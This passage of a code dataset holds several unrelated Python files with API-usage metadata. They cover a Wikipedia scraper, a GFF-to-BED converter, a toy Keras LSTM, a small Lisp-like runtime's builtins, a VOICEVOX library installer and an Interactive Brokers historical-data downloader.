134, "usage_type": "call"}, {"api_name": "os.path", "line_number": 134, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 140, "usage_type": "call"}, {"api_name": "os.path", "line_number": 140, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 141, "usage_type": "call"}, {"api_name": "os.path", "line_number": 141, "usage_type": "attribute"}]} +{"seq_id": "914520887", "text": "import requests\nfrom lxml import html\nencabezados = {\n\"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36\"\n}\nurl = 'https://www.wikipedia.org/'\nresult = requests.get(url, headers=encabezados)\nparse = html.fromstring(result.text)\n#idiomas = parse.xpath(\"//div[contains(@class,'central-featured-lang')]//strong/text()\")\n#for idioma in idiomas:\n #print(idiomas)\nidiomas = parse.find_class('central-featured-lang')\nfor idioma in idiomas:\n print(idioma.text_content())\n\n", "repo_name": "Daroso-96/Scraping", "sub_path": "nivel1/nivel_uno_wikepedia.py", "file_name": "nivel_uno_wikepedia.py", "file_ext": "py", "file_size_in_byte": 547, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 7, "usage_type": "call"}, {"api_name": "lxml.html.fromstring", "line_number": 8, "usage_type": "call"}, {"api_name": "lxml.html", "line_number": 8, "usage_type": "name"}]} +{"seq_id": "6772655006", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\nimport gzip\nimport sys\n\nfrom collections import OrderedDict\n\n\ndef deal_gff_info(info):\n return dict(map(lambda x: x.split(\"=\"), info.split(\";\")))\n\n\ndef read_gff(gfffile):\n if gfffile[-2:] == \"gz\":\n openfile = gzip.open(gfffile)\n else:\n openfile = open(gfffile)\n name = ''\n db = OrderedDict()\n flag = 1\n with openfile as fp:\n for line in fp:\n if line[0] == \"#\":\n continue\n\n line_list = line.strip().split(\"\\t\")\n if line_list[2] == \"mRNA\":\n flag = 1\n name = deal_gff_info(line_list[8])[\"Name\"]\n db[name] =[line_list[0], line_list[3], line_list[4],\n line_list[3], line_list[4], line_list[6], name, name, \"\", [], []]\n # elif line_list[2] == 'mRNA' and flag == 1:\n # db[name][3] = line_list[3]\n # db[name][4] = line_list[4]\n elif line_list[2] == 'CDS':\n db[name][9].append(line_list[3])\n db[name][10].append(line_list[4])\n\n return db\n\ndef out_result(gfffile):\n db = read_gff(gfffile)\n for gene in db:\n db[gene][9] = \",\".join(db[gene][9])\n db[gene][10] = \",\".join(db[gene][10])\n print(\"\\t\".join(db[gene]))\n\n\nif __name__ == \"__main__\":\n out_result(sys.argv[1])\n \n\n", "repo_name": "wangyibin/TDGP", "sub_path": "utils/gff2refbed.py", "file_name": "gff2refbed.py", "file_ext": "py", "file_size_in_byte": 1379, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "61", "api": [{"api_name": "gzip.open", "line_number": 17, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 21, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 52, "usage_type": "attribute"}]} +{"seq_id": "11822454749", "text": "# -*- coding: utf-8 -*-\nimport random\nimport numpy as np\nfrom keras import layers\nfrom keras.models import Sequential\nfrom six.moves import range\n\n\n# 学習データを作成\nDIM = 30\nINPUT_MAX_LEN = 10\nOUTPUT_MAX_LEN = 10\nTRAINING_SIZE = 200\n\nx_data = []\ny_data = []\n\nfor i in range(TRAINING_SIZE + 10):\n # 入力の累積を出力\n s = 
0\n xx = []\n yy = []\n for j in range(INPUT_MAX_LEN):\n rnd = random.randint( 0, 3 )\n x = np.zeros( DIM, dtype=np.bool )\n x[rnd] = True # one-hot voctorにする\n s += rnd\n \n y = np.zeros( DIM, dtype=np.bool )\n y[s] = True # one-hot voctorにする\n\n xx.append(x)\n yy.append(y)\n \n x_data.append(xx)\n y_data.append(yy)\n \nx_data = np.array(x_data)\ny_data = np.array(y_data)\n\n\n# 学習用と評価用に分割\nx_train = x_data[:TRAINING_SIZE]\ny_train = y_data[:TRAINING_SIZE]\n\nx_val = x_data[TRAINING_SIZE:]\ny_val = y_data[TRAINING_SIZE:]\n\n\n# 学習データ生成\nRNN = layers.LSTM\nHIDDEN_SIZE = 256\nBATCH_SIZE = 128\nLAYERS = 1\n\n# モデル構築\ndef model():\n m = Sequential()\n from keras.layers.core import Dense, Reshape\n from keras.layers.wrappers import TimeDistributed\n m.add(RNN(HIDDEN_SIZE, input_shape=(INPUT_MAX_LEN, DIM)))\n m.add(Dense(OUTPUT_MAX_LEN * DIM))\n m.add(Reshape((OUTPUT_MAX_LEN, DIM)))\n m.add(TimeDistributed(Dense(DIM, activation='softmax')))\n return m\n\nmodel = model()\nmodel.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\nmodel.summary()\n\n# 学習\nfor iteration in range(1, 200):\n print()\n print('-----------')\n print('Iteration', iteration)\n model.fit(x_train, y_train,\n batch_size=BATCH_SIZE,\n epochs=1,\n validation_data=(x_val, y_val))\n\n# テスト\nfor i in range(10):\n #ind = np.random.randint(0, len(x_val))\n #rowx, rowy = x_val[np.array([ind])], y_val[np.array([ind])] # replace by x_val, y_val\n preds = model.predict_classes( np.array([x_val[i]]), verbose=0)\n print( \"input: \", [ np.argmax(x) for x in x_val[i] ] )\n print( \"output: \", preds )\n print(\"--------\")\n \n", "repo_name": "naka-tomo/tf_test", "sub_path": "seq2seq.py", "file_name": "seq2seq.py", "file_ext": "py", "file_size_in_byte": 2192, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "six.moves.range", "line_number": 18, "usage_type": "call"}, {"api_name": "six.moves.range", "line_number": 23, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 29, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 39, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 51, "usage_type": "attribute"}, {"api_name": "keras.layers", "line_number": 51, "usage_type": "name"}, {"api_name": "keras.models.Sequential", "line_number": 58, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 62, "usage_type": "call"}, {"api_name": "keras.layers.core.Reshape", "line_number": 63, "usage_type": "call"}, {"api_name": "keras.layers.wrappers.TimeDistributed", "line_number": 64, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 64, "usage_type": "call"}, {"api_name": "six.moves.range", "line_number": 74, "usage_type": "call"}, {"api_name": "six.moves.range", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 88, "usage_type": "call"}]} +{"seq_id": "18904347807", "text": "from fractions import Fraction\n\n'''\nSome builtin functions for bach's runtime\nbach_add/bach_sub etc 
correspond to +/-...\nsee bach_ast for mapping(bach converts all those labels into valid python labels)\nMost of those implementations don't feel pythonic, and that's intentional\nThose functions would be used frequently, so we \ntry to write them more efficiently without too much magic\n'''\n\ndef symbol():\n class BachSymbol(object):\n def __init__(self, value):\n self.value = value\n\n def __repr__(self):\n return \"'%s\" % self.value\n\n def __str__(self):\n return repr(self)\n\n def car(list):\n return list[0]\n\n def cdr(list):\n return list[1:]\n\n def cons(head, tail):\n return [head] + tail\n\n def bach_add(*values):\n return sum(values)\n\n def bach_sub(*values):\n if len(values) == 0:\n raise BachArgumentError(\"expected 1 or more got 0 args for -\")\n elif len(values) == 1:\n return -values[0]\n else:\n value = values[0]\n for n in values[1:]:\n value -= n\n return value\n\n def display(value):\n print(value)\n\n def string(*values):\n result = ''\n for value in values:\n result += value\n return result\n\n def bach_eq(*values):\n if len(values) == 0:\n raise BachArgumentError(\"expected 1 or more got 0 args for =\")\n first = values[0]\n for value in values[1:]:\n if value != first:\n return False\n return True\n\n def bach_neq(*values):\n if len(values) == 0:\n raise BachArgumentError(\"expected 1 or more got 0 args for !=\")\n first = values[0]\n for value in values[1:]:\n if value != first:\n return True\n return False\n\n def bach_gt(*values):\n if len(values) == 0:\n raise BachArgumentError(\"expected 1 or more got 0 args for >\")\n current = values[0]\n for value in values[1:]:\n if current <= value:\n return False\n current = value\n return True\n\n def bach_lt(*values):\n if len(values) == 0:\n raise BachArgumentError(\"expected 1 or more got 0 args for =\")\n current = values[0]\n for value in values[1:]:\n if current >= value:\n return False\n current = value\n return True\n\n def bach_mult(*values):\n value = 1\n for n in values:\n value *= n\n return value\n\n def bach_div(*values):\n if len(values) == 0:\n raise BachArgumentError(\"expected 1 or more got 0 args for /\")\n elif len(values) == 1:\n if isinstance(values[0], (int, Fraction)):\n return Fraction(1, values[0])\n else:\n return 1 / values[0]\n else:\n value = values[0]\n for d in values[1:]:\n if isinstance(value, (int, Fraction)) and isinstance(d, (int, Fraction)):\n return Fraction(value, d)\n else:\n return value / d\n\n return BachSymbol\n\n__all__ = ['car', 'cdr', 'cons', 'bach_add', 'bach_sub', 'bach_mult', 'bach_div', 'display', 'symbol']\n\n\n\n# e? 
-> is_e\n\n# + bach_add\n# - bach_sub\n# * bach_mult\n# / bach_div\n# > bach_gt\n# < bach_lt\n# = bach_eq\n# >= bach_gte\n# != bach_ne\n# <= bach_lte\n# and bach_and\n", "repo_name": "alehander92/bach", "sub_path": "bach/bach_stl/functions.py", "file_name": "functions.py", "file_ext": "py", "file_size_in_byte": 3457, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "fractions.Fraction", "line_number": 103, "usage_type": "name"}, {"api_name": "fractions.Fraction", "line_number": 104, "usage_type": "call"}, {"api_name": "fractions.Fraction", "line_number": 110, "usage_type": "name"}, {"api_name": "fractions.Fraction", "line_number": 111, "usage_type": "call"}]} +{"seq_id": "2242183840", "text": "import base64\nimport json\nimport zipfile\nfrom io import BytesIO\nfrom pathlib import Path\nfrom typing import List\n\nfrom fastapi import HTTPException\n\nfrom voicevox_engine.model import DownloadableLibrary\n\n__all__ = [\"LibraryManager\"]\n\nINFO_FILE = \"metas.json\"\n\n\nclass LibraryManager:\n def __init__(self, library_root_dir: Path):\n self.library_root_dir = library_root_dir\n self.library_root_dir.mkdir(exist_ok=True)\n\n def downloadable_libraries(self):\n # == When fetching the download info over the network\n # url = \"https://example.com/downloadable_libraries.json\"\n # response = requests.get(url)\n # return list(map(DownloadableLibrary.parse_obj, response.json()))\n\n # == When reading the download info from a json file\n # with open(\n # self.root_dir / \"engine_manifest_assets\" / \"downloadable_libraries.json\",\n # encoding=\"utf-8\",\n # ) as f:\n # return list(map(DownloadableLibrary.parse_obj, json.load(f)))\n\n # As a dummy, load the speaker_info assets\n with open(\n \"./engine_manifest_assets/downloadable_libraries.json\",\n encoding=\"utf-8\",\n ) as f:\n libraries = json.load(f)\n speaker_info = libraries[0][\"speakers\"][0][\"speaker_info\"]\n mock_root_dir = Path(\"./speaker_info/7ffcb7ce-00ec-4bdc-82cd-45a8889e43ff\")\n speaker_info[\"policy\"] = (mock_root_dir / \"policy.md\").read_text()\n speaker_info[\"portrait\"] = base64.b64encode(\n (mock_root_dir / \"portrait.png\").read_bytes()\n )\n for style_info in speaker_info[\"style_infos\"]:\n style_id = style_info[\"id\"]\n style_info[\"icon\"] = base64.b64encode(\n (mock_root_dir / \"icons\" / f\"{style_id}.png\").read_bytes()\n )\n style_info[\"voice_samples\"] = [\n base64.b64encode(\n (\n mock_root_dir / \"voice_samples\" / f\"{style_id}_{i:0>3}.wav\"\n ).read_bytes()\n )\n for i in range(1, 4)\n ]\n return list(map(DownloadableLibrary.parse_obj, libraries))\n\n def installed_libraries(self) -> List[DownloadableLibrary]:\n library = []\n for library_dir in self.library_root_dir.iterdir():\n if library_dir.is_dir():\n with open(library_dir / INFO_FILE, encoding=\"utf-8\") as f:\n library.append(json.load(f))\n return library\n\n def install_library(self, library_id: str, file: BytesIO):\n for downloadable_library in self.downloadable_libraries():\n if downloadable_library.uuid == library_id:\n library_info = downloadable_library.dict()\n break\n else:\n raise HTTPException(status_code=404, detail=\"The specified voice library was not found.\")\n library_dir = self.library_root_dir / library_id\n library_dir.mkdir(exist_ok=True)\n with open(library_dir / INFO_FILE, \"w\", encoding=\"utf-8\") as f:\n json.dump(library_info, f, indent=4, ensure_ascii=False)\n with zipfile.ZipFile(file) as zf:\n if zf.testzip() is not None:\n raise HTTPException(status_code=422, detail=\"Invalid ZIP file.\")\n\n 
zf.extractall(library_dir)\n return library_dir\n", "repo_name": "PickledChair/voicevox_engine", "sub_path": "voicevox_engine/downloadable_library.py", "file_name": "downloadable_library.py", "file_ext": "py", "file_size_in_byte": 3536, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "61", "api": [{"api_name": "pathlib.Path", "line_number": 18, "usage_type": "name"}, {"api_name": "json.load", "line_number": 40, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 42, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 44, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 49, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 53, "usage_type": "call"}, {"api_name": "voicevox_engine.model.DownloadableLibrary.parse_obj", "line_number": 60, "usage_type": "attribute"}, {"api_name": "voicevox_engine.model.DownloadableLibrary", "line_number": 60, "usage_type": "name"}, {"api_name": "json.load", "line_number": 67, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 62, "usage_type": "name"}, {"api_name": "voicevox_engine.model.DownloadableLibrary", "line_number": 62, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 70, "usage_type": "name"}, {"api_name": "fastapi.HTTPException", "line_number": 76, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 80, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 81, "usage_type": "call"}, {"api_name": "fastapi.HTTPException", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "18655589999", "text": "from ibapi.wrapper import EWrapper\nfrom ibapi.client import EClient\nfrom ibapi.common import *\nimport sys\nfrom ContractSamples import ContractSamples\nimport time\nfrom datetime import datetime, timedelta\nimport math\nimport pandas as pd\nimport logging\nimport os\nimport queue\nfrom ibapi.contract import Contract\n\nfrom ibapi import comm\n\ndef printWhenExecuting(fn):\n def fn2(self):\n print(\" doing\", fn.__name__)\n fn(self)\n print(\" done w/\", fn.__name__)\n\n return fn2\n\ndef SetupLogger():\n if not os.path.exists(\"log\"):\n os.makedirs(\"log\")\n\n time.strftime(\"pyibapi.%Y%m%d_%H%M%S.log\")\n\n recfmt = '(%(threadName)s) %(asctime)s.%(msecs)03d %(levelname)s %(filename)s:%(lineno)d %(message)s'\n\n timefmt = '%y%m%d_%H:%M:%S'\n\n #logging.basicConfig(level=logging.DEBUG,\n # format=recfmt, datefmt=timefmt)\n logging.basicConfig(filename=time.strftime(\"log/pyibapi.%y%m%d_%H%M%S.log\"),\n filemode=\"w\",\n level=logging.INFO,\n format=recfmt, datefmt=timefmt)\n logger = logging.getLogger()\n console = logging.StreamHandler()\n console.setLevel(logging.ERROR)\n logger.addHandler(console)\n\n\nclass TestWrapper(EWrapper):\n def __init__(self):\n EWrapper.__init__(self)\n self.historical_data = []\n self.historicalDataRequestIds = []\n self.historicalDataReceivedIds = []\n self.earliestTradeDate = ''\n self.endOfHistoricalData = False\n self.positions = {}\n self.positionsEnd = False\n\n def position(self, account: str, contract: Contract, position: float, avgCost: float):\n super().position(account, contract, position, avgCost)\n self.positions[contract.symbol] = [contract.secType, contract.strike, position, avgCost]\n\n def positionEnd(self):\n super().positionEnd()\n self.positionsEnd =True\n print(self.positions)\n\n def error(self, reqId: TickerId, errorCode: int, errorString: str):\n print(\"Error: \", reqId, \" Code: \", errorCode, \" Msg: \", 
errorString+'\\n')\n if errorCode == 162:\n self.endOfHistoricalData = True\n self.historicalDataEnd(reqId, \"\", \"\")\n if errorCode == 502:\n sys.exit()\n\n def headTimestamp(self, reqId: int, headTimestamp: str):\n print(\"HeadTimestamp: \", reqId, \" \", headTimestamp)\n self.earliestTradeDate = headTimestamp\n\n # ! [historicaldata]\n def historicalData(self, reqId:int, bar: BarData):\n #print(\"HistoricalData. \", reqId, \" Date:\", bar.date, \"Open:\", bar.open,\n # \"High:\", bar.high, \"Low:\", bar.low, \"Close:\", bar.close, \"Volume:\", bar.volume,\n # \"Count:\", bar.barCount, \"WAP:\", bar.average)\n self.historical_data.append([reqId, bar.date, bar.open, bar.high, bar.low, bar.close, bar.volume, bar.barCount, bar.average])\n #if not self.historicalDataReceivedIds.count(reqId): self.historicalDataReceivedIds.append(reqId)\n # ! [historicaldata]\n\n # ! [historicaldataend]\n def historicalDataEnd(self, reqId: int, start: str, end: str):\n super().historicalDataEnd(reqId, start, end)\n print(\"HistoricalDataEnd \", reqId, \"from\", start, \"to\", end)\n # ! [historicaldataend]\n\n # ! [historicalDataUpdate]\n def historicalDataUpdate(self, reqId: int, bar: BarData):\n print(\"HistoricalDataUpdate. \", reqId, \" Date:\", bar.date, \"Open:\", bar.open,\n \"High:\", bar.high, \"Low:\", bar.low, \"Close:\", bar.close, \"Volume:\", bar.volume,\n \"Count:\", bar.barCount, \"WAP:\", bar.average)\n # ! [historicalDataUpdate]\n\n # ! [securityDefinitionOptionParameter]\n def securityDefinitionOptionParameter(self, reqId: int, exchange: str,\n underlyingConId: int, tradingClass: str, multiplier: str,\n expirations: SetOfString, strikes: SetOfFloat):\n super().securityDefinitionOptionParameter(reqId, exchange,\n underlyingConId, tradingClass, multiplier, expirations, strikes)\n print(\"Security Definition Option Parameter. ReqId:\", reqId, \"Exchange:\", exchange, \"Underlying conId:\", underlyingConId)\n #print(\"Security Definition Option Parameter. ReqId:%d Exchange:%s Underlying conId: %d \" % reqId, exchange, underlyingConId)\n #print(\"TradingClass:%s Multiplier:%s Exp:%s Strikes:%s\" % tradingClass, multiplier, \",\".join(expirations), \",\".join(str(strikes)))\n print(\"TradingClass:\", tradingClass, \"Multiplier:\", multiplier, \"Exp:\", \",\".join(expirations))\n print(\"Strikes:\", strikes)\n # ! [securityDefinitionOptionParameter]\n\n # ! [securityDefinitionOptionParameterEnd]\n def securityDefinitionOptionParameterEnd(self, reqId: int):\n super().securityDefinitionOptionParameterEnd(reqId)\n print(\"Security Definition Option Parameter End. Request: \", reqId)\n # ! 
[securityDefinitionOptionParameterEnd]\n\n\n\nclass TestClient(EClient):\n def __init__(self, wrapper):\n EClient.__init__(self, wrapper)\n\n\nclass TestApp(TestClient, TestWrapper):\n def __init__(self):\n TestWrapper.__init__(self)\n TestClient.__init__(self, wrapper=self)\n self.nKeybInt = 0\n self.started = False\n self.nextValidOrderId = None\n self.nextRequestId = 5000\n self.historicalDataFrame = pd.DataFrame(columns=[\"reqID\", \"Date\", \"Open\", \"High\", \"Low\",\n \"Close\", \"Volume\", \"Count\", \"WAP\"])\n self.permId2ord = {}\n #self.reqId2nErr = collections.defaultdict(int)\n self.globalCancelOnly = False\n self.simplePlaceOid = None\n self.sampleStock = ContractSamples.USStockAtSmart()\n self.historicalDataReceived = False\n\n #@printWhenExecuting\n def checkQueue(self):\n try:\n print(\"*********Checking Queue***************\")\n text = self.msg_queue.get(block=True, timeout=0.2)\n except queue.Empty:\n print(\"-------------Queue is empty---------------\")\n logging.debug(\"queue.get: empty\")\n else:\n print(\"+++++++++++Reading Data++++++++++++++++++\")\n fields = comm.read_fields(text)\n logging.debug(\"fields %s\", fields)\n #print(datetime.now(), 'CALLING INTERPRETER TOO')\n self.decoder.interpret(fields)\n\n def reqPositions(self):\n super().reqPositions()\n while not self.positionsEnd:\n self.checkQueue()\n\n @printWhenExecuting\n def earliestTradeDate_req(self):\n print('current Stock is:', self.sampleStock.symbol)\n # ! [reqHeadTimeStamp]\n self.reqHeadTimeStamp(self.nextRequestId, self.sampleStock, \"TRADES\", 0, 1)\n # ! [reqHeadTimeStamp]\n time.sleep(1)\n # check the queue if it has arrived\n while self.earliestTradeDate == '':\n self.checkQueue()\n self.sampleStock.earliestTradeDate = self.earliestTradeDate\n # ! [cancelHeadTimestamp]\n self.cancelHeadTimeStamp(self.nextRequestId)\n # ! [cancelHeadTimestamp]\n\n # Increment the request Id\n self.nextRequestId += 1\n\n @printWhenExecuting\n def historicalDataRequests_req(self):\n # ! 
[reqhistoricaldata]\n #queryTime = (datetime.datetime.today() - datetime.timedelta(days=180)).strftime(\"%Y%m%d %H:%M:%S\")\n dateFormatStr = \"%Y%m%d %H:%M:%S\"\n queryTime = datetime.today().strftime(dateFormatStr)\n #queryTime = '20040302 14:30:00'\n # print(\"queryTime = \", queryTime)\n print(\"earliest trades date = \", self.earliestTradeDate)\n print(\"earliest trades date = \", self.sampleStock.earliestTradeDate)\n timeRange = datetime.strptime(queryTime, dateFormatStr) - datetime.strptime(self.earliestTradeDate, dateFormatStr)\n requestPeriod = timedelta(weeks=2)\n steps = math.ceil(timeRange/requestPeriod)\n print(\"Steps:\", steps)\n try:\n for i in range(int(steps)):\n # for i in range(1):\n print(\"step:\", i, \"out of\", steps)\n self.historicalDataReceived = False\n #requestID = 5000\n print('Current stock is:', self.sampleStock.symbol)\n self.reqHistoricalData(self.nextRequestId, self.sampleStock, queryTime,\n \"2 W\", \"5 mins\", \"TRADES\", 1, 1, False, [])\n\n print(\"Requested historical data\")\n\n while (not self.historicalDataReceived) and (not self.endOfHistoricalData):\n self.checkQueue()\n\n # Decriment the query time and Increment the request Id\n queryTime = (datetime.strptime(queryTime, dateFormatStr) - timedelta(weeks=2)).strftime(dateFormatStr)\n self.nextRequestId += 1\n\n if self.endOfHistoricalData:\n print('*************NO MORE DATA************************')\n break\n else:\n self.endOfHistoricalData = True\n self.historicalDataEnd(self.nextRequestId, '', '')\n #else:\n #self.historicalDataRequestIds.append(self.nextHistoricalDataRequestId)\n #print(\"ADDING sent ID\", self.nextHistoricalDataRequestId)\n\n #if i % 5 == 0 and i != 0: time.sleep(2)\n #if i % 60 == 0 and i != 0: time.sleep(60*10)\n #self.reqHistoricalData(4102, ContractSamples.ETF(), queryTime, \"1 Y\", \"1 day\", \"MIDPOINT\", 1, 1, False, [])\n #self.reqHistoricalData(4104, ContractSamples.ETFOption(), queryTime, \"2 W\", \"5 mins\", \"MIDPOINT\", 1, 1, False, [])\n except:\n print(\"Unexpected error:\", sys.exc_info()[0])\n raise\n\n # ! [reqhistoricaldata]\n def historicalDataEnd(self, reqId: int, start: str, end: str):\n super().historicalDataEnd(reqId, start, end)\n print(\"ADDING received ID\", reqId)\n #self.historicalDataReceivedIds.append(reqId)\n self.historicalDataReceived = True\n if self.endOfHistoricalData:\n self.historicalDataStore()\n print(\"Data Stored\")\n\n @printWhenExecuting\n def historicalDataStore(self):\n self.historicalDataFrame = self.historicalDataFrame.append(pd.DataFrame(self.historical_data,\n columns=[\"reqID\", \"Date\", \"Open\",\n \"High\", \"Low\", \"Close\",\n \"Volume\", \"Count\", \"WAP\"]))\n filename = self.sampleStock.symbol+\".h5\"\n self.historicalDataFrame.Date = pd.to_datetime(self.historicalDataFrame.Date)\n self.historicalDataFrame.set_index(\"Date\", inplace=True)\n print('************* Writing to file', filename, '***********************')\n self.historicalDataFrame.to_hdf(filename, 'df', mode='w')\n\n def historicalDataRequests_cancel(self):\n # Canceling historical data requests\n pass\n #self.cancelHistoricalData(4101)\n #self.cancelHistoricalData(4102)\n #self.cancelHistoricalData(4104)\n\n # ! [nextvalidid]\n #@printWhenExecuting\n def nextValidId(self, orderId: int):\n super().nextValidId(orderId)\n\n #self.nextValidOrderId = orderId\n # ! 
[nextvalidid]\n print(\"orderId = \", orderId)\n # we can start now\n self.start()\n\n #@printWhenExecuting\n def start(self):\n if self.started:\n return\n\n self.started = True\n print(\"STARTING\")\n\n if self.globalCancelOnly:\n print(\"Executing GlobalCancel only\")\n self.reqGlobalCancel()\n else:\n print(\"Executing requests\")\n #self.reqGlobalCancel()\n #self.marketDataType_req()\n #self.accountOperations_req()\n #self.tickDataOperations_req()\n #self.marketDepthOperations_req()\n #self.realTimeBars_req()\n #self.reqSecDefOptParams(5001, \"SPY\", \"\", \"STK\", 756733)\n self.reqPositions()\n self.positions.pop(\"ANDV\", None)\n self.positions.pop(\"AVY\", None)\n self.positions.pop(\"NDAQ\", None)\n self.positions.pop('MPC', None)\n for stock in self.positions.keys():\n # re-intialize the list, DataFrame and reset endOfHistoricalData before getting the next stock\n self.historical_data = []\n self.historicalDataFrame = pd.DataFrame(columns=[\"reqID\", \"Date\", \"Open\", \"High\", \"Low\",\n \"Close\", \"Volume\", \"Count\", \"WAP\"])\n self.endOfHistoricalData = False\n self.sampleStock.symbol = stock\n self.earliestTradeDate_req()\n self.historicalDataRequests_req()\n #self.optionsOperations_req()\n #self.marketScanners_req()\n #self.reutersFundamentals_req()\n #self.bulletins_req()\n #self.contractOperations_req()\n #self.contractNewsFeed_req()\n #self.miscelaneous_req()\n #self.linkingOperations()\n #self.financialAdvisorOperations()\n #self.orderOperations_req()\n print(\"Executing requests ... finished\")\n\n def keyboardInterrupt(self):\n self.nKeybInt += 1\n if self.nKeybInt == 1:\n self.stop()\n else:\n print(\"Finishing test\")\n self.done = True\n\n def stop(self):\n print(\"Executing cancels\")\n #self.orderOperations_cancel()\n #self.accountOperations_cancel()\n #self.tickDataOperations_cancel()\n #self.marketDepthOperations_cancel()\n #self.realTimeBars_cancel()\n self.historicalDataRequests_cancel()\n #self.optionsOperations_cancel()\n #self.marketScanners_cancel()\n #self.reutersFundamentals_cancel()\n #self.bulletins_cancel()\n print(\"Executing cancels ... 
finished\")\n\n def nextOrderId(self):\n oid = self.nextValidOrderId\n self.nextValidOrderId += 1\n return oid\n\n\nif __name__ == '__main__':\n SetupLogger()\n app = TestApp()\n app.connect(\"127.0.0.1\", 4001, 0)\n #app.connect(\"127.0.0.1\", 7496, 0)\n\n app.run()\n", "repo_name": "dmitryhits/myIB_API", "sub_path": "IBJts/samples/Python/Testbed/mytestapp.py", "file_name": "mytestapp.py", "file_ext": "py", "file_size_in_byte": 14474, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.exists", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 27, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 29, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 37, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 37, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 39, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 41, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 42, "usage_type": "call"}, {"api_name": "logging.ERROR", "line_number": 43, "usage_type": "attribute"}, {"api_name": "ibapi.wrapper.EWrapper", "line_number": 47, "usage_type": "name"}, {"api_name": "ibapi.wrapper.EWrapper.__init__", "line_number": 49, "usage_type": "call"}, {"api_name": "ibapi.wrapper.EWrapper", "line_number": 49, "usage_type": "name"}, {"api_name": "ibapi.contract.Contract", "line_number": 58, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 73, "usage_type": "call"}, {"api_name": "ibapi.client.EClient", "line_number": 122, "usage_type": "name"}, {"api_name": "ibapi.client.EClient.__init__", "line_number": 124, "usage_type": "call"}, {"api_name": "ibapi.client.EClient", "line_number": 124, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 135, "usage_type": "call"}, {"api_name": "ContractSamples.ContractSamples.USStockAtSmart", "line_number": 141, "usage_type": "call"}, {"api_name": "ContractSamples.ContractSamples", "line_number": 141, "usage_type": "name"}, {"api_name": "queue.Empty", "line_number": 149, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 151, "usage_type": "call"}, {"api_name": "ibapi.comm.read_fields", "line_number": 154, "usage_type": "call"}, {"api_name": "ibapi.comm", "line_number": 154, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 155, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 170, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 187, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 187, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 192, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 192, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 193, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 194, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 212, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 212, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 212, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 230, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 245, "usage_type": "call"}, {"api_name": 
